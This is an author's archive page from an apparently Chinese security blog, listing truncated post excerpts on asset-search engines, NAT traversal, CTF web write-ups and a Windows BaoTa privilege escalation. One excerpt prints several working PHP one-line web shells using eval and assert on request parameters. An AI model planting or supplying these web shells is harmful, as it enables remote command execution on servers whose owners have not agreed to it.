作者: Timozaici

13 篇文章

thumbnail
网络空间搜索引擎简单使用教程
常用资产收集平台 在WEB实战渗透中,信息收集,资产收集至关重要。 所收集到的信息,资产决定了最后成果的产生。 [admonition]以下是几个常用的收集平台: 1.鹰图平台 2.FOFA预览更改 (在新窗口中打开) 3.ZoomEye 4.X情报社区 [/admonition] 各个平台的使用方法 1.鹰图平台 打开后点击查询语法,根据自己的需…
thumbnail
NAT1(Full Cone)利用natter实现内网穿透并在公网上访问
检测NAT类型 需要用到的工具 Python https://www.python.org/downloads/ Natter.py https://github.com/MikeWang000000/Natter/tree/v0.9 建议使用Linux或者直接在路由器上运行,可以获得更好的穿透效果 首先需要检测当前网络的NAT类型是否满足打洞的要…
thumbnail
[CTF]WEB Robots.txt文件
Robots.txt robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。在CTF中常用于提示解题思路 打开题目 看到了没用的提示,看题目是Robots联想到可能存在Robots.txt文件 打开后发现有一个PHP文件…
thumbnail
[CTF]WEB文件包含漏洞
前言 File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。…
thumbnail
[CTF]MISC寻找宝藏
前言 开新坑的第一篇文章,这是一次线上CTF中的真题,记录一下解题过程 CTF 是 Capture The Flag 的简称,中文咱们叫夺旗赛,其本意是西方的一种传统运动。在比赛上两军会互相争夺旗帜,当有一方的旗帜已被敌军夺取,就代表了那一方的战败。在信息安全领域的 CTF 是说,通过各种攻击手法,获取服务器后寻找指定的字段,或者文件中某一个固定格…
thumbnail
[渗透测试]记录一次Windows宝塔提权过程(php)
前言 昨晚上网冲浪的时候有一个网友丢了个shell给我,于是便有了下面的内容。 先使用蚁剑连接上该shell 到了这里可以发现,是一台Windows的服务器,而且使用了宝塔。 接下来开始寻找提权方法 游历目录的时候发现宝塔官方是有提供api接口的,我尝试修改了一下,发现是可读写的状态 奈何研究了一段时间,发现我并不会使用这个api,于是接着寻找其他…
GiWiFi模拟网页认证[python]
[admonition title="前言" color="green"]由于学校采用Giwifi作为校园网接入点,每天凌晨都需要重新认证,于是便有了这个脚本 不需要多余的任何操作,只需要将代码里的 ‘name’: ‘your iphone’, ‘password’: ‘password’, 更换自己的手机号和密码即可[/admonition] i…
thumbnail
常见PHP一句话木马
1、eval.php <?php @eval($_POST['cmd'])?> <?php @eval($_GET['cmd'])?> 2、assert.php <?php assert($_POST[cmd]);?> <?php assert($_GET[cmd]);?> 3、base64_asse…
thumbnail
一周年庆祝
致各位小伙伴们 不知不觉博客都已经开放一周年了,Timo在此感谢各位小伙伴们的一路相伴@ clara/高&冰/随意之光博客/凌中的锋雨/冬天的叶子。还有新认识的朋友@紗夕里/Joseph Z./TomyJan   欢迎你们的到来,常来玩呀 :huaji14: 过去的一年里一共更新了5篇文章,有点少~咕咕咕,今年会更新更多的内容(有空一定会写…